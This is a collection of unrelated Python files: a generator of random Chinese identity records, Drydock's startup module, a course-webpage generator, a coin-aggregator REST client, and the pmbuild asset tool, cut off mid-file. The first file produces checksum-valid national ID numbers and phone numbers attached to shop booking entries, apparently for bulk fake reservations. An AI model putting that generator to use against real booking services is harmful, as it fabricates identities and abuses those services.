# !/user/bin/python # -*- coding:utf-8 -*- import random,threading class peopleinfolist(): def __init__(self, num): self.num = num self.pl = [] self.idl = [] self.namel = [] self.phonel = [] self.peoil = [] #创建多线程,完成身份证、手机号、姓名、预约门店信息的随机生成且不重复 tid = threading.Thread(target=self._getid, args=()) tname = threading.Thread(target=self._getname, args=()) tshop = threading.Thread(target=self._getshop, args=()) tphone = threading.Thread(target=self._getphone, args=()) tid.start() tname.start() tshop.start() tphone.start() tid.join() tname.join() tshop.join() tphone.join() self._makepeopleinfolist() def _getid(self): ''' 生成随机身份证号码,不考虑不同月份天数不同的影响; 只随机日期在28以内的 ''' placenums = ['130102','130104','130105','130107','130108','130109','130110'] weight = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2] cheack_code = {'0': '1','1': '0','2': 'X','3': '9','4': '8','5': '7','6': '6','7': '5','8': '4','9': '3','10': '2'} ids = set() while len(ids) < self.num: placenum = random.choice(placenums) year = str(random.randint(1963,2011)) m = random.randint(1,12) month = str(m) if m > 9 else ('0' + str(m)) d = random.randint(1,28) day = str(d) if d > 9 else ('0' + str(d)) date = year + month + day ID_former = placenum + date + str(random.randint(100,999)) sum = 0 for i, num in enumerate(ID_former): sum += int(num) * weight[i] ID_check = cheack_code[str(sum % 11)] ids.add(ID_former + ID_check) self.idl = list(ids) def _getname(self): #随机生成人员姓名 firstnames = [ '张','白','林','杨','刘','梁','苏','石','赛','尚','丁','董','王', '戴','段','方','范','冯','高','郭','许','徐','聂','黄','赵','周', '章','陈','曾','牛','朱','钟','韩','包','吕','展','魏','金','童', '顾','孙','郑','胡','邓','左','靳','闻','葛','司','田','吴','马', '卞','崔','甄','曹','杜','郝','吕','毛','任','潘','谢','姜','武', '袁','尹','于','何','叶','薛','要','宁','耿','司马','上官','欧阳', '次','冉','艾','诸葛','孔','夏','沙','齐','江','贾','连','秦', '侯','孟','卢','贾','邵','蔡','程','万','姚','罗','韦','唐','朗', '贺','沈','汤','佟','慕','闫','谭','陆','艾','祁','丰','古','娄', '洪','侯' ] lastnames = [ '水','静','敏','聪','辉','慧','淼','永','国','刚','强','风','花', '雪','月','涛','海','萍','晶','丽','利','峰','明','星','兴','乐', '龙','旺','易','婉','楠','笑','霞','光','彩','才','益','帅','琳', '晓','雅','俊','军','赫','凯','耀','杰','芳','航','达','垣','屹', '珊','姗','彬','斌','益','秀','玲','松','铭','洲','亚','叶','文', '娟','玉','婷','博','礼','莉','莹','梦','英','雄','珑','烟','泰', '晨','光','志','智','珉','烨','贤','阳','洋','安','康','翔','丰', '飞','伟','威','薇','娜','冰','霜','浅','清','琴','勤','亮','晴', '青','庆','柳','秋','语','荣','智','志','念','缘','羽','柔','婕', '杉','缤','梅','彤','盛','硕','琼','宁','豪','华','欣','坤','璐', '襄','超','川','宇','柏','贝','慈','睿','瑞','祥','树','兰','岚', '旭','芝','诺','佳','嘉','雨','天','娟','鸿','璐','航','澜','忠', '富','福','悦','越','超','艺','栋','毅','冰','歌','芬','芳','浩', '腾','鑫','蕾','雷','帆','鹏','雷','烟','桃','舟','茜','策','露', '欢','心','一','初','涵','然','璇','颖','腾','蓬','娥','琪','琦', '新','淑','军','君','娇','莎','倩','窈','窕','茗','恒','萱','珍', '昭','朝','宝','萌','楚','瑛','滢','菲','翠','远','云','韵','运', '浮','笙','苼','仙','世','和','碧','靖','菁','宗','剑','河','谨', '义','彦','家','佳','辰','舒','香','茹','柯','德','燕','影','敬', '景','雯','磊','','','','','','','','','','','','','','','','', '','','','','','','','','','','','','','','','','','','','','' ] names = set() while len(names) < self.num: name = random.choice(firstnames) + random.choice(lastnames) + random.choice(lastnames) if len(name) > 1: names.add(name) self.namel = list(names) def _getphone(self): #生成手机号 phsegment = [ '136','139','151','133','156','155','130','177','173','172','188','178','132', '180','150','189','185','186','137','159','131' ] phones = set() while len(phones) < self.num: phone = str(random.choice(phsegment)) + 
str(random.randint(32567112,99998698)) phones.add(phone) self.phonel = list(phones) def _getshop(self): ''' 随机生成门店及区域信息,信息不全 ''' shops = [ {"shopid":"15","areaid":"3"},{"shopid":"18","areaid":"15"},{"shopid":"20","areaid":"15"}, {"shopid":"23","areaid":"15"},{"shopid":"36","areaid":"15"},{"shopid":"37","areaid":"15"}, {"shopid":"38","areaid":"15"},{"shopid":"50","areaid":"15"},{"shopid":"60","areaid":"15"} ] num = self.num while num: num -= 1 self.pl.append(random.choice(shops)) def _makepeopleinfolist(self): ''' 使用所生成的随机数据创建人员信息列表 ''' for index, item in enumerate(self.pl): item['phone'] = self.phonel[index] item['name'] = self.namel[index] item['id'] = self.idl[index] item['yzm'] = '' self.peoil.append(item.copy()) def getpl(self): return self.peoil
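# --- Illustrative usage sketch (not part of the original file) ---
# peopleinfolist(num) spawns four threads that generate unique IDs, names,
# phone numbers and shop bookings, then _makepeopleinfolist() zips them into
# one dict per person. The count of 5 below is arbitrary.
if __name__ == '__main__':
    pil = peopleinfolist(5)
    for person in pil.getpl():
        # Each record holds shopid/areaid plus generated phone, name, id and
        # an empty 'yzm' (verification code) field.
        print(person)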
drydock.py
# Copyright 2017 AT&T Intellectual Property. All other rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import sys import os import threading from oslo_config import cfg from drydock_provisioner import policy from drydock_provisioner.statemgmt.state import DrydockState from drydock_provisioner.ingester.ingester import Ingester from drydock_provisioner.orchestrator.orchestrator import Orchestrator import drydock_provisioner.config as config import drydock_provisioner.objects as objects import drydock_provisioner.control.api as api def start_drydock(enable_keystone=True): objects.register_all() # Setup configuration parsing cli_options = [ cfg.BoolOpt( 'debug', short='d', default=False, help='Enable debug logging'), ] config.config_mgr.conf.register_cli_opts(cli_options) config.config_mgr.register_options(enable_keystone=enable_keystone) config.config_mgr.conf(sys.argv[1:]) if config.config_mgr.conf.debug: config.config_mgr.conf.set_override( name='log_level', override='DEBUG', group='logging') # Setup root logger logger = logging.getLogger( config.config_mgr.conf.logging.global_logger_name) logger.setLevel(config.config_mgr.conf.logging.log_level) ch = logging.StreamHandler() formatter = logging.Formatter( '%(asctime)s - %(levelname)s - %(filename)s:%(funcName)s - %(message)s' ) ch.setFormatter(formatter) logger.addHandler(ch) # Specalized format for API logging logger = logging.getLogger( config.config_mgr.conf.logging.control_logger_name) logger.propagate = False formatter = logging.Formatter( '%(asctime)s - %(levelname)s - %(user)s - %(req_id)s - %(external_ctx)s - %(message)s' ) ch = logging.StreamHandler() ch.setFormatter(formatter) logger.addHandler(ch) state = DrydockState() state.connect_db() input_ingester = Ingester() input_ingester.enable_plugin(config.config_mgr.conf.plugins.ingester) orchestrator = Orchestrator( enabled_drivers=config.config_mgr.conf.plugins, state_manager=state, ingester=input_ingester) orch_thread = threading.Thread(target=orchestrator.watch_for_tasks) orch_thread.start() # Check if we have an API key in the environment # Hack around until we move MaaS configs to the YAML schema if 'MAAS_API_KEY' in os.environ: config.config_mgr.conf.set_override( name='maas_api_key', override=os.environ['MAAS_API_KEY'], group='maasdriver') # Setup the RBAC policy enforcer policy.policy_engine = policy.DrydockPolicy() policy.policy_engine.register_policy() # Ensure that the policy_engine is initialized before starting the API wsgi_callable = api.start_api( state_manager=state, ingester=input_ingester, orchestrator=orchestrator) # Now that loggers are configured, log the effective config config.config_mgr.conf.log_opt_values( logging.getLogger(config.config_mgr.conf.logging.global_logger_name), logging.DEBUG) return wsgi_callable # Initialization compatible with PasteDeploy def paste_start_drydock(global_conf, disable=None): enable_keystone = True if disable is not None: for d in disable.split(): if d == 'keystone': enable_keystone = False return 
start_drydock(enable_keystone=enable_keystone)
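# --- Illustrative sketch (not part of the original file) ---
# start_drydock() returns a WSGI callable, so outside of PasteDeploy/uwsgi it
# can be served directly for local experimentation. A hedged sketch only: it
# assumes a valid drydock configuration and reachable database, and the port
# 9000 is arbitrary.
if __name__ == '__main__':
    from wsgiref.simple_server import make_server
    wsgi_app = start_drydock(enable_keystone=False)
    make_server('0.0.0.0', 9000, wsgi_app).serve_forever()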
generate_subject_webpages.py
#!/usr/bin/env python3 import sys import os import re import yaml import threading from pathlib import Path def gen_files_list(files, prefix=""): files_link_content="" template_link_content= \ """\t<a href=\"<url>\"><name></a> \t<p>(<description>)</p>""" for file in files: print(" file : ", file) darkmode_pdf = False if file[len(file)-9:] == "-dark.pdf": config_file = file[:-9]+'.yaml' darkmode_pdf = True else: config_file = file[:-4]+'.yaml' print("config_file : "+config_file) config = load_config(config_file) name = "Unknown file" desc = "Empty description" if config: name = config["name"] desc = config["description"] if darkmode_pdf: name += " (dark)" desc += " - dark mode" buff = template_link_content file = file.replace("\\","/") buff = re.sub('<url>', prefix+file.split('/')[-1], buff) buff = re.sub('<name>', name, buff) buff = re.sub('<description>', desc, buff) files_link_content += buff +'\n' return files_link_content def generate_content(matiere, pdfs, images, file_path, configs=None): content = Path("sample_subject_webpage.html").read_text() auth = "The author" desc = "The description" title = "The Title" print("config : ",configs) if configs != None: auth = configs["author"] desc = configs["description"] title = configs["title"] content = re.sub('<thedescription>',desc, content) content = re.sub('<theauthor>',auth, content) content = re.sub('<thetitle>',title, content) files_link_content = gen_files_list(pdfs) images_link_content = gen_files_list(images, "images/") content = re.sub('<thefiles>', files_link_content, content) content = re.sub('<theimages>', images_link_content, content) file = open(file_path, "w+") file.write(content) def load_config(yaml_configfile): try: content = open(yaml_configfile) except: return None return yaml.load(content, Loader=yaml.SafeLoader) def list_pdfs(path): files = [] for file in os.listdir(path): if file.endswith(".pdf"): files.append(os.path.join(path, file)) return files def list_images(path): files = [] try: for file in os.listdir(path): if file.endswith(".jpg") or file.endswith(".jpeg"): files.append(os.path.join(path, file)) except: print("No images") return files threads = [] for line in sys.stdin: mat = line.strip() print("args : ", mat) file_path = "./"+mat+"/index.html" print("file path : '"+file_path+"'") pdfs = list_pdfs("./"+mat) images = list_images("./"+mat+"/images") generate_content(mat, pdfs, images, file_path, load_config("./"+mat+"/info.yaml")) thread = threading.Thread(target=generate_content, args=(mat, pdfs, images, file_path, load_config("./"+mat+"/info.yaml"))) thread.start() threads.append(thread) for thread in threads: thread.join()
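# --- Illustrative sketch (not part of the original script) ---
# The script above expects "./<subject>/info.yaml" (author/description/title)
# plus one "<file>.yaml" (name/description) per PDF. A hedged helper that
# writes a skeleton info.yaml for a new subject directory; the helper name and
# placeholder values are not part of the original script.
import yaml
from pathlib import Path

def write_skeleton_config(subject):
    Path(subject).mkdir(exist_ok=True)
    info = {
        "author": "Unknown author",
        "description": "Subject description",
        "title": subject.capitalize(),
    }
    with open(Path(subject) / "info.yaml", "w") as f:
        yaml.dump(info, f)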
aggregator_client.py
import json import threading import requests import websocket from .exceptions import RequestFailedException class AggregatorClient(object): def __init__(self, base_url, ws_url, verify=False, timeout=5): self.base_url = base_url self.verify = verify self.timeout = timeout # self.ws = websocket.WebSocketApp(ws_url, on_message=self.ws_on_message) # self.ws_callback = {} # threading.Thread(target=self.ws.run_forever).start() # def ws_on_message(self, ws, message): # data = json.loads(message) # if callable(self.ws_callback[data['event']]): # self.ws_callback[data['event']](data['arg']) # def emit(self, event, arg): # self.ws.send(json.dumps({'event': event, 'arg': arg}, sort_keys=True)) # def on(self, event, callback): # self.ws_callback[event] = callback def request(self, end_point, method, params=None, data=None, headers=None): url = self.base_url + end_point response = requests.request( method=method, url=url, params=params, data=data, headers=headers, verify=self.verify, timeout=self.timeout, ) if response.ok: return response else: raise RequestFailedException( 'failed reason: {}, text: {}'.format( response.reason, response.text) ) def get_owner(self, uid): end_point = f'/owner/{uid}' response = self.request(end_point, 'GET') return response.text def get_coins(self, owner): end_point = f'/coins/{owner}' response = self.request(end_point, 'GET') return response.text def get_proof(self, uid): end_point = f'/proof/{uid}' response = self.request(end_point, 'GET') return response.text def send_transaction(self, uid, to): # , sig): end_point = '/send_tx' data = {'uid': uid, 'to': to} #, 'sig': sig} response = self.request(end_point, 'POST', data=data) return response.text def submit_state(self): end_point = '/aggregator/submit_state' self.request(end_point, 'POST')
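# --- Illustrative usage sketch (not part of the original module) ---
# AggregatorClient wraps a plain REST API via requests; the websocket support
# is commented out above. A hedged example assuming an aggregator listens on
# localhost:3000 and that the uid and recipient values exist; it is defined as
# an unused helper so importing the module stays side-effect free.
def _example_usage():
    client = AggregatorClient(base_url='http://localhost:3000',
                              ws_url='ws://localhost:3000/ws')
    print(client.get_owner('1'))                      # owner of coin uid 1
    print(client.send_transaction('1', 'new_owner'))  # transfer uid 1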
pmbuild.py
import collections import sys import os.path import json import fnmatch import util import subprocess import platform import shutil import time import dependencies import glob import threading import jsn.jsn as jsn import cgu.cgu as cgu # returns tool to run from cmdline with .exe def tool_to_platform(tool): tool = util.sanitize_file_path(tool) tool = tool.replace("$platform", util.get_platform_name()) if platform.system() == "Windows": tool += ".exe" return tool # ensure running with python3 or py -3 def python_tool_to_platform(tool): tool = util.sanitize_file_path(tool) if platform.system() == "Windows": tool = "py -3 " + tool else: tool = "python3 " + tool return tool # ches if file is excluded based on know files to ignore def is_excluded(file): excluded_files = [".DS_Store"] for ex in excluded_files: if file.find(ex) != -1: return True return False # writes a required value input by the user, into config.user.jsn def update_user_config(k, v, config): config[k] = v user = dict() if os.path.exists("config.user.jsn"): user = jsn.loads(open("config.user.jsn", "r").read()) user[k] = v bj = open("config.user.jsn", "w+") bj.write(json.dumps(user, indent=4)) bj.close() # locate latest version of the windows sdk def locate_windows_sdk(): pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"] sdk = "Windows Kits" sdk_dir = None for v in pf_env: print(v) d = os.environ[v] if d: if sdk in os.listdir(d): print(sdk) print(d) sdk_dir = os.path.join(d, sdk) break if sdk_dir: versions = sorted(os.listdir(sdk_dir), reverse=False) if len(versions) > 0: if versions[0] == "10": # windows 10 has sub versions source = os.path.join(sdk_dir, versions[0], "Source") if os.path.exists(source): sub_versions = sorted(os.listdir(source), reverse=False) if len(sub_versions) > 0: return str(sub_versions[0]) else: # 8.1 return str(versions[0]) return None # windows only, prompt user to supply their windows sdk version def configure_windows_sdk(config): if "sdk_version" in config.keys(): return # attempt to auto locate auto_sdk = locate_windows_sdk() if auto_sdk: update_user_config("sdk_version", auto_sdk, config) return print("Windows SDK version not set.") print("Please enter the windows sdk you want to use.") print("You can find available sdk versions in:") print("Visual Studio > Project Properties > General > Windows SDK Version.") input_sdk = str(input()) update_user_config("sdk_version", input_sdk, config) return # find visual studio installation directory def locate_vs_root(): pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"] vs = "Microsoft Visual Studio" vs_dir = "" for v in pf_env: d = os.environ[v] if d: if vs in os.listdir(d): vs_dir = os.path.join(d, vs) break return vs_dir # find latest visual studio version def locate_vs_latest(): vs_dir = locate_vs_root() if len(vs_dir) == 0: print("[warning]: could not auto locate visual studio, using vs2017 as default") return "vs2017" supported = ["2017", "2019"] versions = sorted(os.listdir(vs_dir), reverse=False) for v in versions: if v in supported: return "vs" + v # attempt to locate vc vars all by lookin in prgoram files, and finding visual studio installations def locate_vc_vars_all(): vs_dir = locate_vs_root() if len(vs_dir) == 0: return None pattern = os.path.join(vs_dir, "**/vcvarsall.bat") # if we reverse sort then we get the latest vs version vc_vars = sorted(glob.glob(pattern, recursive=True), reverse=False) if len(vc_vars) > 0: return vc_vars[0] return None # windows only, configure vcvarsall directory for commandline vc compilation def 
configure_vc_vars_all(config): # already exists if "vcvarsall_dir" in config.keys(): if os.path.exists(config["vcvarsall_dir"]): return # attempt to auto locate auto_vc_vars = locate_vc_vars_all() if auto_vc_vars: auto_vc_vars = os.path.dirname(auto_vc_vars) update_user_config("vcvarsall_dir", auto_vc_vars, config) return # user input while True: print("Cannot find 'vcvarsall.bat'") print("Please enter the full path to the vc2017/vc2019 installation directory containing vcvarsall.bat") input_dir = str(input()) input_dir = input_dir.strip("\"") input_dir = os.path.normpath(input_dir) if os.path.isfile(input_dir): input_dir = os.path.dirname(input_dir) if os.path.exists(input_dir): update_user_config("vcvarsall_dir", input_dir, config) return else: time.sleep(1) # apple only, ask user for their team id to insert into xcode projects def configure_teamid(config): if "teamid" in config.keys(): return print("Apple Developer Team ID not set.") print("Please enter your development team ID ie. (7C3Y44TX5K)") print("You can find team id's or personal team id on the Apple Developer website") print("Optionally leave this blank and you select a team later in xcode:") print(" Project > Signing & Capabilities > Team") input_sdk = str(input()) update_user_config("teamid", input_sdk, config) return # configure user settings for each platform def configure_user(config, args): config_user = dict() if os.path.exists("config.user.jsn"): config_user = jsn.loads(open("config.user.jsn", "r").read()) if util.get_platform_name() == "win32": if "-msbuild" not in sys.argv: configure_vc_vars_all(config_user) configure_windows_sdk(config_user) if os.path.exists("config.user.jsn"): config_user = jsn.loads(open("config.user.jsn", "r").read()) util.merge_dicts(config, config_user) # look for export.json in directory tree, combine and override exports by depth, override further by fnmatch def export_config_for_directory(filedir, platform): filepath = util.sanitize_file_path(filedir) dirtree = filepath.split(os.sep) export_dict = dict() subdir = "" for i in range(0, len(dirtree)): subdir = os.path.join(subdir, dirtree[i]) export = os.path.join(subdir, "export.jsn") if os.path.exists(export): dir_dict = jsn.loads(open(export, "r").read()) util.merge_dicts(export_dict, dir_dict) if platform in export_dict.keys(): util.merge_dicts(export_dict, export_dict[platform]) return export_dict # get file specific export config from the directory config checking for fnmatch on the basename def export_config_for_file(filename): dir_config = export_config_for_directory(os.path.dirname(filename), "osx") bn = os.path.basename(filename) for k in dir_config.keys(): if fnmatch.fnmatch(k, bn): file_dict = dir_config[k] util.merge_dicts(dir_config, file_dict) return dir_config # get files for task, will iterate dirs, match wildcards or return single files, returned in tuple (src, dst) def get_task_files(task): outputs = [] if len(task) != 2: print("[error] file tasks must be an array of size 2 [src, dst]") exit(1) fn = task[0].find("*") if fn != -1: # wildcards fnroot = task[0][:fn - 1] for root, dirs, files in os.walk(fnroot): for file in files: src = util.sanitize_file_path(os.path.join(root, file)) if is_excluded(src): continue if fnmatch.fnmatch(src, task[0]): dst = src.replace(util.sanitize_file_path(fnroot), util.sanitize_file_path(task[1])) outputs.append((src, dst)) elif os.path.isdir(task[0]): # dir for root, dirs, files in os.walk(task[0]): for file in files: src = util.sanitize_file_path(os.path.join(root, file)) if is_excluded(src): 
continue dst = src.replace(util.sanitize_file_path(task[0]), util.sanitize_file_path(task[1])) outputs.append((src, dst)) else: # single file if not is_excluded(task[0]): outputs.append((task[0], task[1])) return outputs # get files for a task sorted by directory def get_task_files_containers(task): container_ext = ".cont" files = get_task_files(task) container_files = [] skip = 0 for fi in range(0, len(files)): if fi < skip: continue f = files[fi] cpos = f[0].find(container_ext) if cpos != -1: container_name = f[0][:cpos + len(container_ext)] export = export_config_for_directory(container_name, "osx") container_src = container_name + "/container.txt" container_dst = os.path.dirname(f[1]) container_dir = os.path.dirname(f[0]) cf = (container_src, container_dst) file_list = "" # list of files in json if "files" in export: for xf in export["files"]: file_list += os.path.join(container_name, xf) + "\n" # otherwise take all files in the directory else: dir_files = sorted(os.listdir(container_dir)) for xf in dir_files: if xf.endswith(".jsn") or xf.endswith(".DS_Store") or xf.endswith(".txt"): continue file_list += os.path.join(container_name, xf) + "\n" update_container = False if os.path.exists(container_src): cur_container = open(container_src, "r").read() if cur_container != file_list: update_container = True else: update_container = True if update_container: open(container_src, "w+").write(file_list) container_files.append(cf) for gi in range(fi+1, len(files)): ff = files[gi] cur_container_name = ff[0][:cpos + len(container_ext)] if cur_container_name != container_name: skip = gi break else: container_files.append(f) return container_files # gets a list of files within container to track in dependencies def get_container_dep_inputs(container_filepath, dep_inputs): cf = open(container_filepath, "r").read().split("\n") for cff in cf: dep_inputs.append(cff) return dep_inputs # set visual studio version for building def run_vs_version(config): supported_versions = [ "vs2017", "vs2019" ] version = config["vs_version"] if version == "latest": config["vs_version"] = locate_vs_latest() print("setting vs_version to: " + config["vs_version"]) return config else: if version not in supported_versions: print("[error]: unsupported visual studio version " + str(version)) print(" supported versions are " + str(supported_versions)) # copy files, directories or wildcards def run_copy(config): print("--------------------------------------------------------------------------------") print("copy ---------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") copy_tasks = config["copy"] for task in copy_tasks: files = get_task_files(task) for f in files: util.copy_file_create_dir_if_newer(f[0], f[1]) # single jsn job to run on a thread def run_jsn_thread(f, ii, config, jsn_tasks): cmd = python_tool_to_platform(config["tools"]["jsn"]) cmd += " -i " + f[0] + " -o " + f[1] + ii imports = jsn.get_import_file_list(f[0], jsn_tasks["import_dirs"]) inputs = [f[0], config["tools"]["jsn"]] for im in imports: inputs.append(im) dep = dependencies.create_dependency_info(inputs, [f[1]], cmd) if not dependencies.check_up_to_date_single(f[1], dep): subprocess.call(cmd, shell=True) dependencies.write_to_file_single(dep, util.change_ext(f[1], ".dep")) # convert jsn to json for use at runtime def run_jsn(config): print("--------------------------------------------------------------------------------") print("jsn 
----------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") threads = [] jsn_tasks = config["jsn"] ii = " -I " for i in jsn_tasks["import_dirs"]: ii += i + " " for task in jsn_tasks["files"]: files = get_task_files(task) for f in files: if not os.path.exists(f[0]): print("[warning]: file or directory " + f[0] + " does not exist!") continue x = threading.Thread(target=run_jsn_thread, args=(f, ii, config, jsn_tasks)) threads.append(x) x.start() for t in threads: t.join() # premake def run_premake(config): print("--------------------------------------------------------------------------------") print("premake ------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") cmd = tool_to_platform(config["tools"]["premake"]) for c in config["premake"]: if c == "vs_version": c = config["vs_version"] cmd += " " + c # add pmtech dir cmd += " --pmtech_dir=\"" + config["env"]["pmtech_dir"] + "\"" # add sdk version for windows if "sdk_version" in config.keys(): cmd += " --sdk_version=\"" + str(config["sdk_version"]) + "\"" # check for teamid if "require_teamid" in config: if config["require_teamid"]: configure_teamid(config) cmd += " --teamid=\"" + config["teamid"] + "\"" subprocess.call(cmd, shell=True) # pmfx def run_pmfx(config): cmd = python_tool_to_platform(config["tools"]["pmfx"]) for c in config["pmfx"]: cmd += " " + c subprocess.call(cmd, shell=True) # single model build / optimise ran on a separate thread def run_models_thread(cmd): p = subprocess.Popen(cmd, shell=True) p.wait() # models def run_models(config): print("--------------------------------------------------------------------------------") print("models -------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") tool_cmd = python_tool_to_platform(config["tools"]["models"]) threads = [] for task in config["models"]: task_files = get_task_files(task) mesh_opt = "" if os.path.exists(config["tools"]["mesh_opt"]): mesh_opt = config["tools"]["mesh_opt"] for f in task_files: cmd = " -i " + f[0] + " -o " + os.path.dirname(f[1]) if len(mesh_opt) > 0: cmd += " -mesh_opt " + mesh_opt x = threading.Thread(target=run_models_thread, args=(tool_cmd + cmd,)) threads.append(x) x.start() for t in threads: t.join() # build third_party libs def run_libs(config): print("--------------------------------------------------------------------------------") print("libs ---------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") shell = ["linux", "osx", "ios"] cmd = "" for arg in config["libs"]: cmd = arg if util.get_platform_name() in shell: pass else: args = "" args += config["env"]["pmtech_dir"] + "/" + " " args += config["sdk_version"] + " " if "vs_version" not in config: config["vs_version"] = "vs2017" args += config["vs_version"] + " " cmd += "\"" + config["vcvarsall_dir"] + "\"" + " " + args print(cmd) p = subprocess.Popen(cmd, shell=True) p.wait() # textures def run_textures(config): print("--------------------------------------------------------------------------------") print("textures -----------------------------------------------------------------------") 
print("--------------------------------------------------------------------------------") tool_cmd = tool_to_platform(config["tools"]["texturec"]) for task in config["textures"]: files = get_task_files_containers(task) for f in files: copy_fmt = [".dds", ".pmv"] conv_fmt = [".png", ".jpg", ".tga", ".bmp", ".txt"] cont_fmt = [".txt"] fext = os.path.splitext(f[0])[1] if fext in copy_fmt: util.copy_file_create_dir_if_newer(f[0], f[1]) if fext in conv_fmt: export = export_config_for_file(f[0]) dep_inputs = [f[0], config["tools"]["texturec"]] if fext in cont_fmt: export = export_config_for_directory(f[0], "osx") dep_inputs = get_container_dep_inputs(f[0], dep_inputs) dst = util.change_ext(f[1], ".dds").lower() # to refactor if "format" not in export.keys(): export["format"] = "RGBA8" cmd = tool_cmd + " " cmd += "-f " + f[0] + " " cmd += "-t " + export["format"] + " " if "cubemap" in export.keys() and export["cubemap"]: cmd += " --cubearray " if "mips" in export.keys() and export["mips"]: cmd += " --mips " cmd += "-o " + dst dep = dependencies.create_dependency_info(dep_inputs, [dst], cmd) if not dependencies.check_up_to_date_single(dst, dep): util.create_dir(dst) subprocess.call(cmd, shell=True) dependencies.write_to_file_single(dep, util.change_ext(dst, ".dep")) # clean def run_clean(config): print("--------------------------------------------------------------------------------") print("clean --------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") for clean_task in config["clean"]: if os.path.isfile(clean_task): print("file " + clean_task) os.remove(clean_task) elif os.path.isdir(clean_task): print("directory " + clean_task) shutil.rmtree(clean_task) # generates metadata json to put in data root dir, for doing hot loading and other re-build tasks def generate_pmbuild_config(config, profile): print("--------------------------------------------------------------------------------") print("pmbuild live reload config -----------------------------------------------------") print("--------------------------------------------------------------------------------") if "data_dir" not in config: print("[error]: did not generate pmbuild_config.json for live reloading") return print("writing " + config["data_dir"] + "/" + "pmbuild_config.json") wd = os.getcwd() pmd = util.sanitize_file_path(config["env"]["pmtech_dir"]) md = { "profile": profile, "pmtech_dir": pmd, "pmbuild": "cd " + wd + " && " + pmd + "pmbuild " + profile + " " } util.create_dir(config["data_dir"]) f = open(os.path.join(config["data_dir"], "pmbuild_config.json"), "w+") f.write(json.dumps(md, indent=4)) # gets a commandline to setup vcvars for msbuil from command line def setup_vcvars(config): return "pushd \ && cd \"" + config["vcvarsall_dir"] + "\" && vcvarsall.bat x86_amd64 && popd" # run build commands def run_build(config): print("--------------------------------------------------------------------------------") print("build --------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") for build_task in config["build"]: if util.get_platform_name() == "win32": build_task = setup_vcvars(config) + " && " + build_task p = subprocess.Popen(build_task, shell=True) e = p.wait() if e != 0: exit(0) def run_cr(config): print("--------------------------------------------------------------------------------") print("cr 
-----------------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print(config["cr"]["output"]) files = config["cr"]["files"] free_funcs = [] added = [] for f in files: source = open(f, "r").read() source = cgu.remove_comments(source) strings, source = cgu.placeholder_string_literals(source) functions, function_names = cgu.find_functions(source) for func in functions: free = len(func["qualifier"]) == 0 for s in func["scope"]: if s["type"] == "struct": free = False break # cant add members if not free: continue # cant add overloads if func["name"] in added: continue added.append(func["name"]) free_funcs.append(func) # start writing code code = cgu.src_line("// codegen_2") code += cgu.src_line("#pragma once") for f in files: code += cgu.src_line('#include ' + cgu.in_quotes(os.path.basename(f))) # use namespaces code += cgu.src_line("namespace put {") # sort by immediate scope scope_funcs = dict() for f in free_funcs: l = len(f["scope"]) if l > 0: s = f["scope"][l-1]["name"] if s not in scope_funcs.keys(): scope_funcs[s] = list() scope_funcs[s].append(f) # add bindings grouped by scope for scope in scope_funcs: code += cgu.src_line("namespace " + scope + "{") # function pointer typedefs for f in scope_funcs[scope]: args = cgu.get_funtion_prototype(f) code += cgu.src_line("typedef " + f["return_type"] + " (*proc_" + f["name"] + ")" + args + ";") # struct struct_name = "__" + scope code += cgu.src_line("struct " + struct_name + " {") code += cgu.src_line("void* " + struct_name + "_start;") # function pointers members for f in scope_funcs[scope]: code += cgu.src_line("proc_" + f["name"] + " " + f["name"] + ";") code += cgu.src_line("void* " + struct_name + "_end;") code += cgu.src_line("};") # bind function pointers to addresses code += cgu.src_line("#if !DLL") code += cgu.src_line("void generate_bindings(" + struct_name + "* ctx){") for f in scope_funcs[scope]: code += cgu.src_line("ctx->" + f["name"] + " = &" + f["name"] + ";") code += cgu.src_line("}") code += cgu.src_line("#endif") code += cgu.src_line("}") # pointers to contexts code += cgu.src_line("struct live_context {") code += cgu.src_line("f32 dt;") code += cgu.src_line("pen::render_ctx render;") code += cgu.src_line("ecs::ecs_scene* scene;") for scope in scope_funcs: code += cgu.src_line(scope + "::__" + scope + "* " + scope + "_funcs;") code += cgu.src_line("};") code += cgu.src_line("}") # namespace put output_file = open(config["cr"]["output"], "w") output_file.write(cgu.format_source(code, 4)) return # top level help def pmbuild_help(config): print("pmbuild -help ------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("\nusage: pmbuild <profile> <tasks...>") print("\noptions:") print(" -help (display this dialog).") print(" -<task> -help (display task help).") print(" -cfg (print jsn config for current profile).") print(" -msbuild (indicates msbuild prompt and no need to call vcvarsall.bat") print("\nprofiles:") print(" config.jsn (edit task settings in here)") for p in config.keys(): print(" " * 8 + p) print("\ntasks (in order of execution):") print(" -all (builds all tasks).") print(" -n<task name> (excludes task).") print(" -clean (delete specified directories).") print(" -libs (build thirdparty libs).") print(" -premake (run premake, generate ide projects).") print(" -models (convert to binary model, skeleton and 
material format).") print(" -pmfx (shader compilation, code-gen, meta-data gen).") print(" -textures (convert, compress, generate mip-maps, arrays, cubemaps).") print(" -copy (copy files, folders or wildcards) [src, dst].") print("\n") def clean_help(config): print("clean help ---------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("removes all intermediate and temp directories:") print("\njsn syntax: array of [directories to remove...].") print("clean: [") print(" [<rm dir>],") print(" ...") print("]") print("\n") def vs_version_help(config): print("vs version help ---------------------------------------------------------------") print("-------------------------------------------------------------------------------") print("select version of visual studio for building libs and porjects:") print("\njsn syntax:") print("vs_version: <version>") print("\n") print("version options:") print(" latest (will choose latest version installed on your machine)") print(" vs2017 (minimum supported compiler)") print(" vs2019") print("\n") def 